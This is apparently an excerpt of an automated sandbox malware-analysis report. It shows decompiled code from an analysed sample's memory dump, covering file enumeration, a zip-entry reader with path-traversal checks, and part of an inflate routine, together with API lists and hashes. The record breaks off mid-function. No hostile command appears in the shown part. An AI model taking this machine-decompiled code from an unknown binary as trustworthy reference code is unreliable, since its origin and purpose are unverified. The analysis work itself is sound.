Part of subcall function 00410BC5: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,0043D12C), ref: 00410C56
Part of subcall function 00410BC5: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,0043D12C), ref: 00410C71
Part of subcall function 00410BC5: GetFileSize.KERNEL32(00000000,00000000,?,?,0043D12C), ref: 00410C79
Part of subcall function 00410BC5: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,0043D12C), ref: 00410C89
Part of subcall function 00410BC5: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0043D12C), ref: 00410CB3
Part of subcall function 00410BC5: StrStrA.SHLWAPI(?,?,?,0043D12C), ref: 00410CC5
Part of subcall function 00410BC5: lstrlenA.KERNEL32(?,?,0043D12C), ref: 00410CE0
Part of subcall function 00410BC5: StrStrA.SHLWAPI(00000003,?,?,0043D12C), ref: 00410CF7
Part of subcall function 00410BC5: lstrcat.KERNEL32(00414A84,0043D130), ref: 00410D05
Part of subcall function 00410BC5: lstrcat.KERNEL32(00414A84), ref: 00410D12
Part of subcall function 00410BC5: lstrcat.KERNEL32(00414A84,?), ref: 00410D1F

FindNextFileA.KERNEL32(?,?), ref: 00411AA7
FindClose.KERNEL32(?), ref: 00411ABB

Strings

%s\*, xrefs: 0041190B
%s\%s, xrefs: 00411990

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find_memset$HeapPointerwsprintf$AllocCloseCopyCreateFirstNextProcessReadSizelstrlen
String ID: %s\%s$%s\*
API String ID: 4058350616-2848263008
Opcode ID: e6fe10cc26a82e2273b1d7b0916ecc96bd7e522417bce8c5f543a4ad5637a677
Instruction ID: c92175f60cfa361b7ef1459b51fb10357ab2b134b63d2846e4354dd18c2726d8
Opcode Fuzzy Hash: e6fe10cc26a82e2273b1d7b0916ecc96bd7e522417bce8c5f543a4ad5637a677
Instruction Fuzzy Hash: E7518A7190022DABCF25DF60DD44AEA7BBCFF09345F0044AAB619E2120E7359B85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00407F35 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 391
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00407F35(signed int* __ecx, signed int __edx, intOrPtr* __edi, intOrPtr _a4) {
				signed int _v12;
				char _v280;
				char _v544;
				struct _SYSTEMTIME _v560;
				signed char _v561;
				signed char _v562;
				signed char _v563;
				signed int _v564;
				intOrPtr* _v568;
				char _v572;
				char _v574;
				char _v575;
				signed int _v576;
				struct _FILETIME _v584;
				struct _FILETIME _v592;
				struct _FILETIME _v600;
				unsigned int _v628;
				intOrPtr _v652;
				intOrPtr _v656;
				unsigned int _v664;
				unsigned int _v680;
				void* __ebx;
				void* __esi;
				signed int _t147;
				intOrPtr _t149;
				void* _t150;
				signed int _t158;
				intOrPtr _t160;
				void* _t165;
				signed int _t172;
				signed int _t173;
				signed int _t180;
				unsigned int _t192;
				long _t204;
				signed int _t213;
				signed char _t214;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t256;
				unsigned int _t268;
				signed int _t270;
				unsigned int _t272;
				signed int _t279;
				signed char* _t289;
				signed char _t301;
				intOrPtr* _t311;
				intOrPtr* _t313;
				void* _t315;
				signed int _t316;
				signed int _t319;
				void* _t320;
				void* _t322;
				void* _t323;

				_t311 = __edi;
				_t297 = __edx;
				_t147 =  *0x444664; // 0xfa3a0753
				_v12 = _t147 ^ _t319;
				_t149 = _a4;
				_t312 = __ecx;
				_v568 = __ecx;
				if(_t149 < 0xffffffff) {
					L61:
					_t150 = 0x10000;
					L62:
					return E0041F69E(_t150, _t251, _v12 ^ _t319, _t297, _t311, _t312);
				}
				_t251 =  *__ecx;
				if(_t149 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if(__ecx[1] != 0xffffffff) {
					E00407E46(_t251);
					_t149 = _a4;
				}
				 *(_t312 + 4) =  *(_t312 + 4) | 0xffffffff;
				if(_t149 !=  *((intOrPtr*)(_t312 + 0x134))) {
					__eflags = _t149 - 0xffffffff;
					if(_t149 != 0xffffffff) {
						_t255 =  *_t312;
						__eflags = _t149 -  *((intOrPtr*)(_t255 + 0x10));
						if(_t149 <  *((intOrPtr*)(_t255 + 0x10))) {
							E0040776B(_t255);
							_t312 = _v568;
							_t149 = _a4;
						}
						_t256 =  *_t312;
						__eflags =  *((intOrPtr*)(_t256 + 0x10)) - _t149;
						if( *((intOrPtr*)(_t256 + 0x10)) >= _t149) {
							L15:
							E00407548( *_t312,  &_v680, 0,  &_v544, 0x104);
							_t158 = E004078FC(__eflags,  *_t312,  &(_v584.dwHighDateTime),  &_v576,  &_v572);
							_t322 = _t320 + 0x24;
							__eflags = _t158;
							if(_t158 == 0) {
								_t297 = _v576;
								_t160 =  *((intOrPtr*)( *_t312));
								_t312 = 0;
								__eflags = E004070FB(_t160, _v576, 0);
								if(__eflags == 0) {
									_t251 = E0041EC5E(_t251, _t297, _t311, 0, __eflags, _v572);
									_t312 =  *((intOrPtr*)( *_v568));
									_t165 = E0040715A( *((intOrPtr*)( *_v568)), _t251, 1, _v572);
									_t323 = _t322 + 0xc;
									__eflags = _t165 - _v572;
									if(_t165 == _v572) {
										 *_t311 =  *((intOrPtr*)( *_v568 + 0x10));
										E0041F7C0( &_v280,  &_v544);
										_t313 =  &_v280;
										while(1) {
											_t172 =  *_t313;
											__eflags = _t172;
											if(_t172 == 0) {
												break;
											}
											L23:
											__eflags =  *((char*)(_t313 + 1)) - 0x3a;
											if( *((char*)(_t313 + 1)) != 0x3a) {
												goto L25;
											}
											_t313 = _t313 + 2;
											while(1) {
												_t172 =  *_t313;
												__eflags = _t172;
												if(_t172 == 0) {
													break;
												}
												goto L23;
											}
											L25:
											__eflags = _t172 - 0x5c;
											if(_t172 == 0x5c) {
												L27:
												_t313 = _t313 + 1;
												while(1) {
													_t172 =  *_t313;
													__eflags = _t172;
													if(_t172 == 0) {
														break;
													}
													goto L23;
												}
												goto L25;
											}
											__eflags = _t172 - 0x2f;
											if(_t172 != 0x2f) {
												_t173 = E004207C5(_t313, "\\..\\");
												__eflags = _t173;
												if(_t173 != 0) {
													L32:
													_t45 = _t173 + 4; // 0x4
													_t313 = _t45;
													continue;
												}
												_t173 = E004207C5(_t313, "\\../");
												__eflags = _t173;
												if(_t173 != 0) {
													goto L32;
												}
												_t173 = E004207C5(_t313, "/../");
												__eflags = _t173;
												if(_t173 != 0) {
													goto L32;
												}
												_t173 = E004207C5(_t313, "/..\\");
												__eflags = _t173;
												if(_t173 == 0) {
													E00420641(_t311 + 4, _t313, 0x104);
													_t268 = _v628;
													_v563 = _t268 >> 0x0000001e & 0x00000001;
													_t180 = _v680 >> 8;
													_t320 = _t323 + 0xc;
													_t301 =  !(_t268 >> 0x17) & 0x00000001;
													_v562 = 0;
													_v561 = 0;
													_v564 = 1;
													__eflags = _t180;
													if(_t180 == 0) {
														L37:
														_v562 = _t268 >> 0x00000001 & 0x00000001;
														_v561 = _t268 >> 0x00000002 & 0x00000001;
														_t301 = _t268 & 0x00000001;
														_t270 = _t268 >> 0x00000005 & 0x00000001;
														__eflags = _t270;
														_v563 = _t268 >> 0x00000004 & 0x00000001;
														_v564 = _t270;
														L38:
														 *(_t311 + 0x108) =  *(_t311 + 0x108) & 0x00000000;
														__eflags = _v563;
														if(_v563 != 0) {
															 *(_t311 + 0x108) = 0x10;
														}
														__eflags = _v564;
														if(_v564 != 0) {
															_t62 = _t311 + 0x108;
															 *_t62 =  *(_t311 + 0x108) | 0x00000020;
															__eflags =  *_t62;
														}
														__eflags = _v562;
														if(_v562 != 0) {
															_t65 = _t311 + 0x108;
															 *_t65 =  *(_t311 + 0x108) | 0x00000002;
															__eflags =  *_t65;
														}
														__eflags = _t301;
														if(_t301 != 0) {
															_t67 = _t311 + 0x108;
															 *_t67 =  *(_t311 + 0x108) | 0x00000001;
															__eflags =  *_t67;
														}
														__eflags = _v561;
														if(_v561 != 0) {
															_t70 = _t311 + 0x108;
															 *_t70 =  *(_t311 + 0x108) | 0x00000004;
															__eflags =  *_t70;
														}
														 *((intOrPtr*)(_t311 + 0x124)) = _v656;
														 *((intOrPtr*)(_t311 + 0x128)) = _v652;
														_t192 = _v664;
														_t272 = _t192 >> 0x10;
														_v560.wYear = (_t272 >> 9) + 0x7bc;
														_v560.wDay = _t272 & 0x0000001f;
														_v560.wHour = _t192 >> 0xb;
														_v560.wSecond = (_t192 & 0x0000001f) + (_t192 & 0x0000001f);
														_v560.wMilliseconds = 0;
														_t297 = _t272 >> 0x00000005 & 0x0000000f;
														_v560.wMonth = _t272 >> 0x00000005 & 0x0000000f;
														_v560.wMinute = _t192 >> 0x00000005 & 0x0000003f;
														SystemTimeToFileTime( &_v560,  &_v584);
														_v600.dwLowDateTime = _v584.dwLowDateTime;
														_v600.dwHighDateTime = _v584.dwHighDateTime;
														LocalFileTimeToFileTime( &_v600,  &_v592);
														_t204 = _v592.dwLowDateTime;
														_t279 = _v592.dwHighDateTime;
														_t315 = 0;
														__eflags = _v572 - 4;
														 *(_t311 + 0x10c) = _t204;
														 *(_t311 + 0x110) = _t279;
														 *(_t311 + 0x114) = _t204;
														 *(_t311 + 0x118) = _t279;
														 *(_t311 + 0x11c) = _t204;
														 *(_t311 + 0x120) = _t279;
														if(_v572 <= 4) {
															L58:
															__eflags = _t251;
															if(_t251 != 0) {
																_push(_t251);
																E004207DC();
															}
															_t312 = _v568;
															E0041F8C0(_t312 + 8, _t311, 0x12c);
															 *((intOrPtr*)(_t312 + 0x134)) = _a4;
															goto L7;
														} else {
															while(1) {
																_v576 =  *((intOrPtr*)(_t315 + _t251));
																_v575 =  *((intOrPtr*)(_t251 + _t315 + 1));
																_v584.dwHighDateTime =  *(_t251 + _t315 + 2) & 0x000000ff;
																_v574 = 0;
																_t213 = E0041F730( &_v576, "UT");
																__eflags = _t213;
																if(_t213 == 0) {
																	break;
																}
																_t315 = _t315 + _v584.dwHighDateTime + 4;
																__eflags = _t315 + 4 - _v572;
																if(_t315 + 4 < _v572) {
																	continue;
																}
																goto L58;
															}
															_t214 =  *(_t315 + _t251 + 4) & 0x000000ff;
															_v561 = _t214 >> 0x00000001 & 0x00000001;
															_t316 = _t315 + 5;
															_v562 = _t214 >> 0x00000002 & 0x00000001;
															__eflags = _t214 & 0x00000001;
															if((_t214 & 0x00000001) != 0) {
																_t293 = _t316 + _t251;
																_t297 = (_t316 + _t251)[1] & 0x000000ff;
																_t316 = _t316 + 4;
																__eflags = _t316;
																 *(_t311 + 0x11c) = E004050FF((((_t293[3] & 0x000000ff) << 0x00000008 | _t293[2] & 0x000000ff) << 0x00000008 | _t297) << 0x00000008 |  *_t293 & 0x000000ff, _t297);
																 *(_t311 + 0x120) = _t297;
															}
															__eflags = _v561;
															if(_v561 != 0) {
																_t291 = _t316 + _t251;
																_t297 = (_t316 + _t251)[1] & 0x000000ff;
																_t316 = _t316 + 4;
																__eflags = _t316;
																 *(_t311 + 0x10c) = E004050FF((((_t291[3] & 0x000000ff) << 0x00000008 | _t291[2] & 0x000000ff) << 0x00000008 | _t297) << 0x00000008 |  *_t291 & 0x000000ff, _t297);
																 *(_t311 + 0x110) = _t297;
															}
															__eflags = _v562;
															if(_v562 != 0) {
																_t289 = _t316 + _t251;
																_t297 = _t289[1] & 0x000000ff;
																__eflags = (((_t289[3] & 0x000000ff) << 0x00000008 | _t289[2] & 0x000000ff) << 0x00000008 | _t297) << 0x00000008 |  *_t289 & 0x000000ff;
																 *(_t311 + 0x114) = E004050FF((((_t289[3] & 0x000000ff) << 0x00000008 | _t289[2] & 0x000000ff) << 0x00000008 | _t297) << 0x00000008 |  *_t289 & 0x000000ff, _t297);
																 *(_t311 + 0x118) = _t297;
															}
															goto L58;
														}
													}
													__eflags = _t180 - 7;
													if(_t180 == 7) {
														goto L37;
													}
													__eflags = _t180 - 0xb;
													if(_t180 == 0xb) {
														goto L37;
													}
													__eflags = _t180 - 0xe;
													if(_t180 != 0xe) {
														goto L38;
													}
													goto L37;
												}
												goto L32;
											}
											goto L27;
										}
									}
									_push(_t251);
									E004207DC();
								}
								_t150 = 0x800;
								goto L62;
							}
							_t150 = 0x700;
							goto L62;
						} else {
							do {
								E004077A0( *_t312);
								_t244 =  *_v568;
								_t312 = _v568;
								__eflags =  *((intOrPtr*)(_t244 + 0x10)) - _a4;
							} while ( *((intOrPtr*)(_t244 + 0x10)) < _a4);
							goto L15;
						}
					}
					goto L10;
				} else {
					if(_t149 == 0xffffffff) {
						L10:
						 *_t311 =  *((intOrPtr*)( *_t312 + 4));
						 *((char*)(_t311 + 4)) = 0;
						 *(_t311 + 0x108) = 0;
						 *(_t311 + 0x10c) = 0;
						 *(_t311 + 0x110) = 0;
						 *(_t311 + 0x114) = 0;
						 *(_t311 + 0x118) = 0;
						 *(_t311 + 0x11c) = 0;
						 *(_t311 + 0x120) = 0;
						 *((intOrPtr*)(_t311 + 0x124)) = 0;
						 *((intOrPtr*)(_t311 + 0x128)) = 0;
						L8:
						_t150 = 0;
						goto L62;
					}
					E0041F8C0(_t311, _t312, 0x12c);
					L7:
					goto L8;
				}
			}

0x00407f35
0x00407f35
0x00407f3e
0x00407f45
0x00407f48
0x00407f4d
0x00407f4f
0x00407f58
0x004084a0
0x004084a0
0x004084a5
0x004084b2
0x004084b2
0x00407f5e
0x00407f63
0x00000000
0x00000000
0x00407f6d
0x00407f6f
0x00407f74
0x00407f74
0x00407f77
0x00407f81
0x00407fa1
0x00407fa4
0x00407feb
0x00407fed
0x00407ff0
0x00407ff4
0x00407ff9
0x00407fff
0x00407fff
0x00408002
0x00408004
0x00408007
0x00408026
0x0040803d
0x0040805c
0x00408061
0x00408064
0x00408066
0x00408074
0x0040807a
0x0040807c
0x00408083
0x00408085
0x004080a3
0x004080ad
0x004080b2
0x004080b7
0x004080ba
0x004080c0
0x004080d6
0x004080e6
0x004080ed
0x004080f3
0x004080f3
0x004080f5
0x004080f7
0x00000000
0x00000000
0x004080f9
0x004080f9
0x004080fd
0x00000000
0x00000000
0x004080ff
0x004080f3
0x004080f3
0x004080f5
0x004080f7
0x00000000
0x00000000
0x00000000
0x004080f7
0x00408104
0x00408104
0x00408106
0x0040810c
0x0040810c
0x004080f3
0x004080f3
0x004080f5
0x004080f7
0x00000000
0x00000000
0x00000000
0x004080f7
0x00000000
0x004080f3
0x00408108
0x0040810a
0x00408115
0x0040811c
0x0040811e
0x00408153
0x00408153
0x00408153
0x00000000
0x00408153
0x00408126
0x0040812d
0x0040812f
0x00000000
0x00000000
0x00408137
0x0040813e
0x00408140
0x00000000
0x00000000
0x00408148
0x0040814f
0x00408151
0x00408162
0x00408167
0x00408179
0x00408187
0x0040818a
0x0040818d
0x00408190
0x00408197
0x0040819e
0x004081a5
0x004081a7
0x004081b8
0x004081be
0x004081cb
0x004081dd
0x004081e0
0x004081e0
0x004081e3
0x004081e9
0x004081ef
0x004081ef
0x004081f6
0x004081fd
0x004081ff
0x004081ff
0x00408209
0x00408210
0x00408212
0x00408212
0x00408212
0x00408212
0x00408219
0x00408220
0x00408222
0x00408222
0x00408222
0x00408222
0x00408229
0x0040822b
0x0040822d
0x0040822d
0x0040822d
0x0040822d
0x00408234
0x0040823b
0x0040823d
0x0040823d
0x0040823d
0x0040823d
0x0040824a
0x00408256
0x0040825c
0x00408264
0x00408276
0x00408282
0x00408290
0x0040829e
0x004082a7
0x004082c1
0x004082c8
0x004082cf
0x004082d6
0x004082e2
0x004082ee
0x00408302
0x00408308
0x0040830e
0x00408314
0x00408316
0x0040831d
0x00408323
0x00408329
0x0040832f
0x00408335
0x0040833b
0x00408341
0x00408472
0x00408472
0x00408474
0x00408476
0x00408477
0x0040847c
0x0040847d
0x0040848d
0x00408495
0x00000000
0x00408347
0x00408347
0x0040834a
0x00408354
0x0040835f
0x00408371
0x00408378
0x0040837f
0x00408381
0x00000000
0x00000000
0x00408389
0x00408390
0x00408396
0x00000000
0x00000000
0x00000000
0x00408398
0x0040839d
0x004083a9
0x004083b7
0x004083ba
0x004083c0
0x004083c2
0x004083c4
0x004083d4
0x004083e5
0x004083e5
0x004083ed
0x004083f3
0x004083f3
0x004083f9
0x00408400
0x00408402
0x00408412
0x00408423
0x00408423
0x0040842b
0x00408431
0x00408431
0x00408437
0x0040843e
0x00408440
0x00408450
0x0040845f
0x00408466
0x0040846c
0x0040846c
0x00000000
0x0040843e
0x00408341
0x004081a9
0x004081ac
0x00000000
0x00000000
0x004081ae
0x004081b1
0x00000000
0x00000000
0x004081b3
0x004081b6
0x00000000
0x00000000
0x00000000
0x004081b6
0x00000000
0x00408151
0x00000000
0x0040810a
0x004080f3
0x004080c2
0x004080c3
0x004080c8
0x00408087
0x00000000
0x00408087
0x00408068
0x00000000
0x00408009
0x00408009
0x0040800b
0x00408016
0x0040801b
0x00408021
0x00408021
0x00000000
0x00408009
0x00408007
0x00000000
0x00407f83
0x00407f86
0x00407fa6
0x00407fab
0x00407faf
0x00407fb3
0x00407fb9
0x00407fbf
0x00407fc5
0x00407fcb
0x00407fd1
0x00407fd7
0x00407fdd
0x00407fe3
0x00407f9a
0x00407f9a
0x00000000
0x00407f9a
0x00407f92
0x00407f97
0x00000000
0x00407f97

APIs

_memmove.LIBCMT ref: 00407F92

Part of subcall function 004070FB: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,004072B1), ref: 00407127

_strcat.LIBCMT ref: 004080E6
__fassign.LIBCMT ref: 00408162
SystemTimeToFileTime.KERNEL32(?,?), ref: 004082D6
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00408302
_memmove.LIBCMT ref: 0040848D

Strings

\../, xrefs: 00408120
/..\, xrefs: 00408142
/../, xrefs: 00408131
\..\, xrefs: 0040810F

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileTime$_memmove$LocalPointerSystem__fassign_strcat
String ID: /../$/..\$\../$\..\
API String ID: 1654736473-3885502717
Opcode ID: 7b4e54c5559be2ab2f69f34c9b14987336873f901169635362c9e61a4e5207c8
Instruction ID: fee6d1e7403b96389c3b882f2e8ccd15ac50011da470b4891d1ab24223596c11
Opcode Fuzzy Hash: 7b4e54c5559be2ab2f69f34c9b14987336873f901169635362c9e61a4e5207c8
Instruction Fuzzy Hash: 1DF106709046159FDB24DB24C8857D5BBF0EF19304F1441EEE499E7381DB39AA86CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00405850 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 662
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00405850(signed char** __eax, unsigned int _a4, signed int _a8) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				unsigned int _v20;
				unsigned int _v24;
				unsigned int _v28;
				unsigned int _v32;
				unsigned int _v36;
				char _v40;
				char _v44;
				unsigned int __ebx;
				unsigned int __edi;
				unsigned int __esi;
				signed int _t407;
				unsigned int _t409;
				signed int _t410;
				unsigned int _t413;
				signed int _t419;
				unsigned int _t421;
				signed int _t426;
				signed int _t427;
				unsigned int _t428;
				unsigned int _t430;
				unsigned int _t431;
				signed int* _t437;
				signed int _t438;
				signed char _t446;
				signed int _t447;
				unsigned int* _t448;
				signed char* _t449;
				signed int* _t450;
				void* _t453;

				_t437 = _a4;
				_t438 = _t437[0xd];
				_t448 = __eax;
				_t449 =  *__eax;
				_v16 = __eax[1];
				_v12 = _t437[8];
				_v8 = _t437[7];
				_t407 = _t437[0xc];
				_v24 = _t449;
				_v20 = _t438;
				if(_t438 >= _t407) {
					_t409 = _t437[0xb] - _t438;
					__eflags = _t409;
				} else {
					_t409 = _t407 - _t438 - 1;
				}
				_v28 = _t409;
				_t410 =  *_t437;
				if(_t410 <= 9) {
					while(1) {
						switch( *((intOrPtr*)(_t410 * 4 +  &M00406028))) {
							case 0:
								goto L14;
							case 1:
								goto L27;
							case 2:
								goto L36;
							case 3:
								goto L59;
							case 4:
								goto L72;
							case 5:
								goto L98;
							case 6:
								goto L102;
							case 7:
								goto L127;
							case 8:
								goto L129;
							case 9:
								goto L114;
						}
						L102:
						__eax = _v12;
						 *((intOrPtr*)(__ebx + 0x20)) = _v12;
						__eax = _v8;
						 *(__ebx + 0x1c) = _v8;
						__eax = _v16;
						 *(__edi + 4) = _v16;
						__esi = __esi -  *__edi;
						 *__edi = __esi;
						 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__edi + 8)) + __esi -  *__edi;
						__eax = _v20;
						__esi = _a4;
						 *(__ebx + 0x34) = _v20;
						__ebx = __edi;
						__eax = __esi;
						__eax = E00405236(__esi, __edi, _a8);
						__eflags = __eax - 1;
						if(__eax != 1) {
							_push(__eax);
							goto L10;
						}
						__ebx = 0;
						_a8 = 0;
						 *((intOrPtr*)(__edi + 0x24))( *((intOrPtr*)(__edi + 0x28)),  *(__esi + 4)) =  *__edi;
						_v24 =  *__edi;
						__eax =  *(__edi + 4);
						_v16 =  *(__edi + 4);
						__eax =  *(__esi + 0x20);
						_v12 =  *(__esi + 0x20);
						__eax =  *(__esi + 0x1c);
						_pop(__ecx);
						_pop(__ecx);
						__ecx =  *(__esi + 0x34);
						_v8 =  *(__esi + 0x1c);
						__eax =  *(__esi + 0x30);
						_v20 = __ecx;
						__eflags = __ecx - __eax;
						if(__ecx >= __eax) {
							__eax =  *(__esi + 0x2c);
							__eax =  *(__esi + 0x2c) - __ecx;
							__eflags = __eax;
						} else {
							__eax = __eax - __ecx;
							__eax = __eax - 1;
						}
						_v28 = __eax;
						__eflags =  *((intOrPtr*)(__esi + 0x18)) - __ebx;
						if( *((intOrPtr*)(__esi + 0x18)) != __ebx) {
							 *__esi = 7;
							__ebx = __esi;
							goto L127;
						} else {
							 *__esi = __ebx;
							__ebx = __esi;
							L108:
							_t410 =  *_t437;
							__eflags = _t410 - 9;
							if(_t410 <= 9) {
								_t449 = _v24;
								continue;
							}
							goto L4;
						}
						while(1) {
							L98:
							__eax =  *(__ebx + 4);
							__eax = __eax >> 5;
							__ecx = __eax >> 0x00000005 & 0x0000001f;
							_t273 = __eax + 0x102; // 0x10a
							__eax = __ecx + _t273;
							__eflags =  *(__ebx + 8) - __ecx + _t273;
							if( *(__ebx + 8) >= __ecx + _t273) {
								break;
							}
							__eax =  *(__ebx + 0x10);
							while(1) {
								__eflags = _v8 - __eax;
								if(_v8 >= __eax) {
									break;
								}
								__eflags = _v16;
								if(_v16 == 0) {
									L110:
									_push(_a8);
									_t437[8] = _v12;
									_t437[7] = _v8;
									_t448[1] = _t448[1] & 0x00000000;
									goto L8;
								}
								__edx =  *__esi & 0x000000ff;
								__ecx = _v8;
								_a8 = _a8 & 0x00000000;
								_v16 = _v16 - 1;
								__edx = ( *__esi & 0x000000ff) << __cl;
								_v12 = _v12 | ( *__esi & 0x000000ff) << __cl;
								__esi = __esi + 1;
								_t199 =  &_v8;
								 *_t199 = _v8 + 8;
								__eflags =  *_t199;
								_v24 = __esi;
							}
							__eax =  *(0x43d8c8 + __eax * 4);
							__eax = __eax & _v12;
							__ecx =  *(__ebx + 0x14);
							__eax =  *(__ebx + 0x14) + __eax * 8;
							__ecx =  *(__eax + 1) & 0x000000ff;
							__edx =  *(__eax + 4);
							_v32 = __ecx;
							_v36 = __edx;
							__eflags = __edx - 0x10;
							if(__edx >= 0x10) {
								__eflags = __edx - 0x12;
								if(__edx != 0x12) {
									__eax = __edx - 0xe;
								} else {
									__eax = 7;
								}
								__ecx = 0;
								__eflags = __edx - 0x12;
								0 | __edx == 0x00000012 = 3 + (__edx == 0x12) * 8;
								_v28 = 3 + (__edx == 0x12) * 8;
								while(1) {
									__ecx = _v32;
									__edx = __eax + __ecx;
									__eflags = _v8 - __eax + __ecx;
									if(_v8 >= __eax + __ecx) {
										break;
									}
									__eflags = _v16;
									if(_v16 == 0) {
										goto L110;
									}
									__edx =  *__esi & 0x000000ff;
									__ecx = _v8;
									_a8 = _a8 & 0x00000000;
									_v16 = _v16 - 1;
									__edx = ( *__esi & 0x000000ff) << __cl;
									_v12 = _v12 | ( *__esi & 0x000000ff) << __cl;
									__esi = __esi + 1;
									_t237 =  &_v8;
									 *_t237 = _v8 + 8;
									__eflags =  *_t237;
									_v24 = __esi;
								}
								_v12 = _v12 >> __cl;
								 *(0x43d8c8 + __eax * 4) =  *(0x43d8c8 + __eax * 4) & _v12;
								_v28 = _v28 + ( *(0x43d8c8 + __eax * 4) & _v12);
								__ecx = __eax;
								__eax = __eax + _v32;
								_v12 = _v12 >> __cl;
								_v8 = _v8 - __eax;
								__eax =  *(__ebx + 4);
								__ecx =  *(__ebx + 8);
								__eax = __eax >> 5;
								__edx = __eax >> 0x00000005 & 0x0000001f;
								_t258 = __eax + 0x102; // 0x10a
								__eax = __edx + _t258;
								_v28 = _v28 + __ecx;
								__eflags = _v28 + __ecx - __eax;
								if(_v28 + __ecx > __eax) {
									L120:
									 *((intOrPtr*)(__edi + 0x24))( *((intOrPtr*)(__edi + 0x28)),  *(__ebx + 0xc)) = _v12;
									 *__ebx = 9;
									 *(__edi + 0x18) = "invalid bit length repeat";
									 *((intOrPtr*)(__ebx + 0x20)) = _v12;
									__eax = _v8;
									 *(__ebx + 0x1c) = _v8;
									__eax = _v16;
									 *(__edi + 4) = _v16;
									__eax = _v24;
									__ecx = __eax;
									__ecx = __eax -  *__edi;
									 *__edi = __eax;
									__eax = _v20;
									 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__edi + 8)) + __ecx;
									__esi = __ebx;
									 *(__ebx + 0x34) = _v20;
									return E0040511C(__ecx, __edi, __ebx, 0xfffffffd);
								}
								__eflags = _v36 - 0x10;
								if(_v36 != 0x10) {
									__eax = 0;
									__eflags = 0;
									do {
										L96:
										__edx =  *(__ebx + 0xc);
										 *( *(__ebx + 0xc) + __ecx * 4) = __eax;
										__ecx = __ecx + 1;
										_t268 =  &_v28;
										 *_t268 = _v28 - 1;
										__eflags =  *_t268;
									} while ( *_t268 != 0);
									 *(__ebx + 8) = __ecx;
									continue;
								}
								__eflags = __ecx - 1;
								if(__ecx < 1) {
									goto L120;
								}
								__eax =  *(__ebx + 0xc);
								__eax =  *( *(__ebx + 0xc) + __ecx * 4 - 4);
								goto L96;
							}
							_v12 = _v12 >> __cl;
							__eax = __ecx;
							_v8 = _v8 - __ecx;
							__eax =  *(__ebx + 8);
							__ecx =  *(__ebx + 0xc);
							 *( *(__ebx + 0xc) +  *(__ebx + 8) * 4) = __edx;
							 *(__ebx + 8) =  *(__ebx + 8) + 1;
						}
						__eax =  *(__ebx + 4);
						 *(__ebx + 0x14) =  *(__ebx + 0x14) & 0x00000000;
						 &_v40 =  &_v44;
						 &_v32 =  &_v28;
						__ecx = __eax;
						__ecx = __eax >> 5;
						__ebx = __eax;
						__eax = _a4;
						__eax =  *(_a4 + 0xc);
						__ecx = __ecx + 1;
						__ebx = __ebx & 0x0000001f;
						__ebx = __ebx + 0x101;
						__esi = __edi;
						_v28 = 9;
						_v32 = 6;
						__ebx = E0040659E( *(_a4 + 0xc), __ebx, __edi, __ecx,  &_v28,  &_v32,  &_v44,  &_v40,  *((intOrPtr*)(__ebx + 0x24)));
						__eflags = __ebx;
						if(__ebx != 0) {
							__esi = _a4;
							__eflags = __ebx - 0xfffffffd;
							if(__ebx == 0xfffffffd) {
								__eax =  *((intOrPtr*)(__edi + 0x24))( *((intOrPtr*)(__edi + 0x28)),  *((intOrPtr*)(__esi + 0xc)));
								_pop(__ecx);
								_pop(__ecx);
								 *__esi = 9;
							}
							__eax = _v12;
							 *(__esi + 0x20) = _v12;
							__eax = _v8;
							 *(__esi + 0x1c) = _v8;
							__eax = _v16;
							 *(__edi + 4) = _v16;
							__eax = _v24;
							__ecx = __eax;
							__ecx = __eax -  *__edi;
							 *__edi = __eax;
							__eax = _v20;
							 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__edi + 8)) + __ecx;
							 *(__esi + 0x34) = _v20;
							__esi = _a4;
							_push(__ebx);
							goto L10;
						}
						__eax = __edi;
						__eax = E00405205(__edi, _v28, _v32, _v44, _v40);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = _a4;
							__ecx = _v12;
							 *((intOrPtr*)(__eax + 0x20)) = _v12;
							__ecx = _v8;
							 *((intOrPtr*)(__eax + 0x1c)) = _v8;
							__ecx = _v16;
							 *(__edi + 4) = _v16;
							__ecx = _v24;
							__edx = __ecx;
							__edx = __ecx -  *__edi;
							 *__edi = __ecx;
							__ecx = _v20;
							 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__edi + 8)) + __edx;
							 *(__eax + 0x34) = __ecx;
							_push(0xfffffffc);
							__esi = __eax;
							goto L10;
						}
						__esi = _a4;
						 *(__esi + 4) = __eax;
						__eax =  *((intOrPtr*)(__edi + 0x24))( *((intOrPtr*)(__edi + 0x28)),  *((intOrPtr*)(__esi + 0xc)));
						_pop(__ecx);
						 *__esi = 6;
						__ebx = __esi;
						__esi = _v24;
						_pop(__ecx);
						goto L102;
						while(1) {
							L72:
							 *(__ebx + 4) =  *(__ebx + 4) >> 0xa;
